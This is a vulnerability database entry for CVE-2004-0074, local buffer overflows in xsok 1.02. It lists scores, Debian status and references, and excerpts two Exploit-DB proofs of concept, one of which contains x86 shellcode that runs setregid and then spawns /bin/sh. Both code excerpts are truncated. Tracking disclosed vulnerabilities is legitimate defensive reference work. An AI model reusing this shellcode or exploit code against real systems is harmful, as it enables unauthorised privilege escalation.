CVE-2004-0074
Published 2004-02-17
Priority P4 · 15 · medium · 4.6 CVSS 2.0
AV:L/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.99% (58.2th percentile)
Multiple buffer overflows in xsok 1.02 allow local users to gain privileges via (1) a long LANG environment variable, or (2) a long -xsokdir command line argument, a different vulnerability than CVE-2003-0949.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | xsok | — | — |
| michael_bischoff | xsok | — | — |
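CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 4.6 | MEDIUM | AV:L/AC:L/Au:N/C:P/I:P/A:P |
| vendor_debian | — | 4.6 | LOW | — |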
GHSA
GHSA-jggx-7jmp-p9ff: Multiple buffer overflows in xsok 1
ghsa_unreviewed·2022-04-29·CVSS 4.6
Debian
CVE-2004-0074: xsok - Multiple buffer overflows in xsok 1.02 allows local users to gain privileges via...
vendor_debian·2004·CVSS 4.6
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game
exploitdb·2004-01-02
---
```c
/* 0x333xsok (2) => xsok 1.02 local game exploit
 *
 * Happy new year ! (2 :)
 * coded by c0wboy
 *
 * (c) 0x333 Outsiders Security Labs / www.0x333.org
 *
 */
#include
#include
#define BIN "/usr/games/xsok"
#define RETADD 0xbffffa3c
#define SIZE 200
unsigned char shellcode[] =
    /* setregid (20,20) shellcode */
    "\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
    "\xcd\x80"
    /* exec /bin/sh shellcode */
    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
    "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
int main (int argc, char ** argv)
{
    int i, ret = RETADD;
    char out[SIZE];
    fprintf(stdout, "\n --- 0x333xsok => xsok 1.02 local games exploit ---\n");
    fprintf(stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n");
    int *xsok = (int *)(o
```
Exploit-DB
XSOK 1.0 2 - 'LANG Environment' Local Buffer Overrun
exploitdb·2003-12-30
---
// source: https://www.securityfocus.com/bid/9341/info
xsok is prone to a locally exploitable buffer overrun vulnerability due to insufficient bounds checking of data supplied through the LANG environment variable. This could be exploited to execute arbitrary code with elevated privileges. The program is typically installed setgid games.
```c
/*
   xsok 1.02 local game exploit
   coded by n2n, n2nlinuxmail.org
   Eye on Security Research Group, India http://www.eos-india.net
   This exploit calculates the return address automatically.
   Also the shellcode is improved and automatically gets the effective uid and gid of the vulnerable binary.
   Tested on Redhat Linux 9.0
*/
#define VULN "/usr/X11R6/bin/xsok"
#define BUFLEN 100
#include
#include
#include
```
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=107307407027259&w=2
http://marc.info/?l=bugtraq&m=107332542918529&w=2
http://www.securityfocus.com/bid/9341
http://www.securityfocus.com/bid/9352
https://exchange.xforce.ibmcloud.com/vulnerabilities/14906
https://exchange.xforce.ibmcloud.com/vulnerabilities/14910
Published: 2004-02-17